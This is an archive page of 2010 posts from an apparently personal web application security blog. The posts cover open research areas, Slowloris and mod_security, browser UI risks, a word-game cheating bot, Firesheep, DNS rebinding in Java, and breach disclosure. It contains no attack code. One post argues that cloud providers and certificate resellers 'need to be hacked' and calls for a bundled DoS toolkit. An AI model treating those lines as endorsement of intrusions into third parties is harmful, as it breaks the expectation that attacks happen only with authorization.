Cenzic 232 Patent
Paid Advertising
web application security lab

Archive for the 'Webappsec' Category

What’s Left?

Wednesday, December 1st, 2010

2 posts left…

As I wind down, I’ve gotten a lot of requests to talk about various things in my final posts. Everything from talking about what to study for newbies, how to keep up on WebAppSec when I’m gone, to talking about O2. But what I really want to talk about is what’s left? After having researched for 15 years and having blogged for 5, what areas do I think are left to research/write/build? There are tons of things. I’ll just type free-form for the next few minutes:

- I think mobile browsers are Swiss cheese and they need a much more serious look. And then we need to have a fierce conversation with the mobile providers about better/faster mechanisms to do patch management.

- I think browser port blocking blacklists are dumb and have already been broken at least three times. It’s time to do a month of inter-protocol exploitation!

- I think browser UP&P attacks against routers are highly likely and need a lot more research.

- I think the whole concept of replacing SSL/TLS with SSL/TLS over DNSSEC needs a ton of thought as a replacement.

- Browser UIs need to be hammered - they all have problems.

- Re-writing firmware in home DSL routers and making router-based botnets is under-researched.

- A table of all the ways to leak information across domains (img tags, style tags, iframes, etc…) needs to be kept and cataloged by browser type.

- An acid test should be built on a website somewhere so that people can test all known security problems against their browser. Then we can start a healthy competition and track how long each browser takes to close each issue.

- Cloud providers need to be hacked to prove how frail everything is that rely on them.

- SSL/TLS resellers need to be hacked to prove how frail PKI is when you distribute it out to the least common denominator.

- Alternate encoding issues are still barely understood and very poorly documented.

- Someone needs to build a ubiquitous DoS (not DDoS) package that includes every known DoS tool and throw it into MetaSploit, so companies start having to test against it and start pressuring the vendors to fix the issues.

… and that’s just what I could type out in a few minutes. Look, anyone who says there’s nothing left to research isn’t thinking creatively. There’s an absolutely amazing amount of issues out there left to research, and projects to make the industry move faster. One problem I wish the industry would get away from is saying something isn’t new or isn’t interesting. If it’s not new but it’s still broken, there’s a problem there (Firesheep is a great example). If you’re interested in it, don’t let other people tell you it’s not interesting. Go ahead and research it! So what’s left? Everything’s left, my friends! The world is yours! You have the power to make amazing things happen if you so choose. It’s just a matter of deciding what kind of world you want to live in.

Mod_Security and Slowloris

Wednesday, December 1st, 2010

3 posts left…

After all the press around Wong Onn Chee and Tom Brennan’s version of a HTTP DoS attack, I think people started taking HTTP DoS a tad more seriously. Yes, there are lots of variants of HTTP based DoS attack, and I’m sure more tools will surface over time. The really interesting part is how both Apache and IIS has disagreed that it is their problem to fix. So we are left to fend for ourselves. Enter mod_security (at least for Apache).

When I originally tested Slowloris against mod_security, it had no chance of solving the problem. I spoke with Ivan Ristic who said that it simply ran too late (same thing with .htaccess, and many other things built into Apache). So the world was at a bit of a loss when the DoS originally came out. Now with the latest changes in mod_security at least we now have a viable (non experimental) solution other than using alternate webservers, load balancers or networking solutions. Very cool stuff!

Minimalistic UI Decisions in Browsers

Tuesday, November 30th, 2010

4 posts left…

I’ve tried to talk about this a few times to people over the last year or so, but I think it’s hard to explain without pictures. So I gathered a bunch of screen shots that should help explain why I’m not a huge fan of the minimalistic browser concept. More browsers are getting on board with this, and while I absolutely do believe it makes people more productive and therefore faster, there are some negatives that are worth pointing out. Frankly, I do believe there is a lot of wasted space in browsers, so at first blush, I’m sure most people would agree that the various browsers are heading into the right direction by emulating Chrome. I actually agree with the basic concept, with the exception that I think there are some gotchas that are worth thinking about before we’re “got”.

I’m certainly not saying there’s no way to fix these issue either, but I don’t think it’s wise to run headlong into a bunch of potentially dangerous problems without knowing that they’re there. So I hope this sheds some light for those people I talked to, and for anyone else who’s interested! :)

Cheating Part 2

Sunday, November 21st, 2010

5 posts left…

So my Wife decided that she loves to play that game “Words with Friends” on the iPhone. It’s basically just like Scrabble but probably for legal reasons it’s just slightly different (bonus placement, tile value, etc… are different). Unfortunately for me, my Wife is scary smart and knows the English language far better than I. So I’m at a huge disadvantage when playing games that involve words or spelling. The only thing I’m good at is the math part, figuring out what the highest scoring word is… oh, yeah, and cheating. Well after a few dozen games, I kinda got fed up with the whole thing and started looking for ways to cheat. Sure, it’s probably talking an unencrypted protocol and it’s probably doing most of it’s validation checks on the client side, but my Wife is going to notice if I start using words that aren’t words.

So I start thinking about writing a tool that brute forces through the dictionary and attempts each word in a simulator to see if it’ll fit. Then the idea starts taking shape in the form of a program that starts tabulating which letters are worth what, and where the various double and triple word scores are in relation, etc… It grows in complexity further and further until I finally decide that I had better test it before I go much further. So on my first trial run it picks the word, “exine”. Okay, whatever, I plug it in and it works as expected. My Wife was on chat with me at the same time and instantly she writes, “Wtf is exine? You’re cheating.” So at this point I look up the word and sure enough it’s defined as “the outer coat of a spore, esp. a pollen grain” to which she write, “You totally cheated. You are so not a botanist. Spore my ass. Your mom is the outer coat of a spore. I don’t believe it for a second that you knew that word before playing it.”

Alas, all that work and she called me out the VERY first time I tried out my program. Of course in hindsight I should have parsed apart every word I had ever written in the blog or in my books and compared them against the dictionary to only use words that I was guaranteed to know. Such a waste. So I never got to try my other theories, about how to play defensively. For instance when I know there’s only a certain number of letters left in the deck of tiles, I can figure out which characters she can have left and the probability of which words she can play.

It would have been fun to create a contest to see which strategies are the most effective in a bot on bot scenario. Is an all defensive strategy better, or an all offensive (always opportunistically taking the highest value word)? Or maybe a hybrid of both where you play defensively at some points or offensively when you know it’s better in the long run. Anyway… unlike the previous cheating at Casino night it was not a very successful attempt. Like I said, my Wife knows that I cheat - she knows her adversary way too well. You win some, you lose some, I guess. That’s what I get for not marrying a bimbo.

FireSheep

Monday, November 15th, 2010

7 posts left…

I go back and forth on whether I think FireSheep is interesting or not. Clearly, it’s old technology re-hashed. But it is interesting not because it works, but that it surprises people that it works. We’ve been talking about these problems forever, and now companies are scrambling to protect themselves. I guess the threat isn’t real until every newbie on earth has access to the hacking tools to exploit it.

One of the more interesting analysis pages I’ve seen was one which had a scorecard. At first blush it’s fairly obvious but one thing stuck out at me regarding the last part of the scorecard, where they assigned scores to each of the various protocols like POP3 fails but POP3 over SSL/TLS gets an A. The interesting thing is that there isn’t an equivalent score for HTTP vs HTTPS. This all goes back to the 24 vulnerabilities Josh and I talked about in the browser implementation of SSL/TLS in the browser.

Just because something is speaking HTTPS some of the time doesn’t even mean that session alone is secure in a multi-tabbed environment, or with certain plugins, or certain settings or with certain settings within cookies, etc… It’s just not that straight forward. Wouldn’t it be nice if we had something that did act in a safe and sane way that allowed you to contact a site securely? Maybe something that was a secured transport layer (no, not TLS, I mean something actually secure). ;) Maybe it’s something we can add on top of SSL/TLS over DNSSEC while we’re in the browser security world are still in the mood to shake things up.

Detecting Malice With ModSecurity

Thursday, October 28th, 2010

8 posts remaining…

Ryan Barnett has a new series he’s doing called Detecting Malice with ModSecurity that I wanted to spend a minute talking about. Firstly, it’s personally interesting, because he’s using the book and slicing and dicing a lot of the core ideas and figuring out how to implement them. But secondly, I like practical examples of solutions to concepts that may seem to be unattainable or a technological hurdle at times. One of the reasons I didn’t spend any time talking about solutions was because so many people have varying platforms. That’s one of the nice things about the Internet but it’s also one of the problems. It seems like attacks are easier to talk about because nearly everyone is vulnerable to them. But defense is much harder, because it is always very site specific.

Anyway, it’s a great series and I recommend it, even after just the first post - not just because it’s talking about the book, but also because he really does a really nice job of giving thorough examples. I hope some people get some value out of it. Even if you use IIS, ideas like this get the creative juices flowing. Sometimes it’s tough being a security guy, so any little bit helps.

Performance Primitives

Wednesday, October 20th, 2010

11 more posts left…

While I was out at Bluehat I ended up having some good meetings between Intel, Mozilla and Adobe. How are these companies related, you may ask? Well all of them care about performance. A year or so ago I was hanging out with the Intel guys and they informed me that they have a series of low level performance primitives that they surface through APIs. At the time I wasn’t quite sure what to make of it. Security and performance aren’t natural bedfellows - or at least I didn’t think so at the time.

I got to talking with both Microsoft and Mozilla last week about the need for default Adblocking software built into the browser. Jeremiah thinks it should be opt-out and I think it should be opt-in, but either way, I think we’re coming to a consensus that it should be automatically part of the browser in some form. Mozilla was the first to give me a real reason it may be a problem other than it hurting Google, who is their biggest sponsor. The reason is performance. Adblockplus, as an example uses partial string regex which is a performance hog. To put that in the browser by default would really make people’s experience suffer. Then it occurred to me that I had had a conversation about performance with Intel a year before. The answer, my friends, lies in primitives.

Currently Intel supports a subset of basic math functions and Perl’s version of regex. Well, in a future version the chips could support things like the JavaScript version of regex, and other primitives involved in decision making and image/vector rendering and so on that are used within the browser. Adobe is in the same boat - although probably a different subset of primitives would be desirable. Then the idea sprang up to use these primitives within Visual Studio itself to get more generic/native improvements to performance without developers having to know anything about the chip. Intel doesn’t tend to market these concepts very well, despite how interesting they could be, but only a few people have to know to make a big difference.

So now the real question isn’t whether these companies will pick up on this technology now that they know about it - that’s a given. The real question then is once they get a performance boost are they going to use some of it to improve security or are they just going to tout themselves as the fastest? At some point we have to stop and ask ourselves how fast do we really have to get before we start using some of that processing power to make people safer instead? One can only hope…

DNS Rebinding In Java Is Back

Wednesday, October 20th, 2010

9 posts remaining…

Stefano Di Paola has an interesting article about DNS Rebinding in Java. Apparently he’s found a way to bring back some of the older exploits that were supposedly fixed in Java back in 2007-2008 timeframe. Really cool read. Half way through reading it I realized that this would enable exploits like the one where sites often have localhost.whatever.com tied back to 127.0.0.1. The old exploit worked in that if you could ever find an XSS in a local service you could set cookies for whatever.com domain, or read any cookies that were set to the entire domain. It’s a nasty exploit, but rare because there don’t tend to be a lot of local services installed on desktop computers that are vulnerable to XSS by default.

Then I kept reading and he enumerates that exact use case - great minds think alike! Anyway, this apparently will be fixed in a future update, but now that we’ve seen DNS rebinding hit Java twice, I think Java needs to have a much more critical eye. Things like this shouldn’t be sitting around for years before they’re noticed. Like inter-protocol exploitation this research needs a lot more eyes. Great work by Stefano!

Performance Primitives

Wednesday, October 20th, 2010

11 more posts left…

While I was out at Bluehat I ended up having some good meetings between Intel, Mozilla and Adobe. How are these companies related, you may ask? Well all of them care about performance. A year or so ago I was hanging out with the Intel guys and they informed me that they have a series of low level performance primitives that they surface through APIs. At the time I wasn’t quite sure what to make of it. Security and performance aren’t natural bedfellows - or at least I didn’t think so at the time.

I got to talking with both Microsoft and Mozilla last week about the need for default Adblocking software built into the browser. Jeremiah thinks it should be opt-out and I think it should be opt-in, but either way, I think we’re coming to a consensus that it should be automatically part of the browser in some form. Mozilla was the first to give me a real reason it may be a problem other than it hurting Google, who is their biggest sponsor. The reason is performance. Adblockplus, as an example uses partial string regex which is a performance hog. To put that in the browser by default would really make people’s experience suffer. Then it occurred to me that I had had a conversation about performance with Intel a year before. The answer, my friends, lies in primitives.

Currently Intel supports a subset of basic math functions and Perl’s version of regex. Well, in a future version the chips could support things like the JavaScript version of regex, and other primitives involved in decision making and image/vector rendering and so on that are used within the browser. Adobe is in the same boat - although probably a different subset of primitives would be desirable. Then the idea sprang up to use these primitives within Visual Studio itself to get more generic/native improvements to performance without developers having to know anything about the chip. Intel doesn’t tend to market these concepts very well, despite how interesting they could be, but only a few people have to know to make a big difference.

So now the real question isn’t whether these companies will pick up on this technology now that they know about it - that’s a given. The real question then is once they get a performance boost are they going to use some of it to improve security or are they just going to tout themselves as the fastest? At some point we have to stop and ask ourselves how fast do we really have to get before we start using some of that processing power to make people safer instead? One can only hope…

Odds, Disclosure, Etc…

Tuesday, September 14th, 2010

12 posts left…

While doing some research I happened across an old post of mine that I had totally forgotten about. It was an old post about betting on the chances of compromise. Specifically I was asked to give odds against whether I thought Google or ha.ckers.org would survive a penetration test (ultimately leading to disclosure of data). Given that both Google and ha.ckers.org are under constant attack, it stands to reason that sitting in the ecosystem is virtually the equivalent of a penetration test every day. I wasn’t counting things like little bugs that are disclosed in our sites, I was specifically counting only data compromise.

There are a few interesting things about this post, looking back 4 years. The first thing is that pretty much everything I predicted came true in regards to Google:

… their corporate intranet is strewn with varying operating systems, with outdated versions of varying browsers. Ouch. Allowing access from the intranet out to the Internet is a recipe for disaster …

So yes, this is damned near how Google was compromised. However, there’s one very important thing, if I want to be completely honest, that I didn’t understand back then. I gave Google a 1:300 (against) odds on being hacked before ha.ckers.org would be. While I was right, in hindsight, I’d have to change my odds. I should have given it more like 1:30. The important part that I missed was the disclosure piece. Any rational person would assume that Google has had infections before (as has any large corporation that doesn’t retain tight controls over their environment). That’s nothing new - and not what I was talking about anyway. I was talking only about publicly known disclosures of data compromise.

So the part that I didn’t talk to, and the part that is the most interesting is that Google actually disclosed the hack. Now if we were to go back in time and you were to tell me that Google would get hacked into and then disclose that information voluntarily, I would have called BS. Now the cynics might say that Google had no choice - that too many people already knew, and it was either tell the world or have someone out you in a messy way. But that’s irrelevant. I still wouldn’t have predicted it.

So that brings me to the point of the post (as you can hopefully see, this is not a Google bashing post or an I told you so post). I went to Data Loss DB the other day and I noticed an interesting downward trend over the last two years. It could be due to a lot of things. Maybe people are losing their laptops less or maybe hackers have decided to slow down all that hacking they were doing. No, I suspect it’s because in the dawn of social networking and collective thinking, companies fear disclosure more than ever before. They don’t want to have a social uprising against them when people find out their information has been copied off. Since I have no data to back it up, I have a question for all the people who are involved in disclosing or recovering from security events. How many compromises of data security, that you are aware of, have been disclosed to the public as a percentage? You don’t have to post under your own name - I just want to get some idea of what other people are seeing.

If my intuition is correct, this points to the same or more breaches than ever before, but less and less public scrutiny and awareness of what happened to the public’s information. Perhaps this points to a lack of good whistle-blower laws against failing to disclose compromises (and monetary incentives for good Samaritans to do so). Or perhaps this points to a more scary reality where the bad-guys have all the compromised machines and data that they need for the moment. Either way, it’s a very interesting downward trend in the public stats that seems incongruent to what I hear when I talk to people. Is the industry really seeing less successful attacks than a few years ago?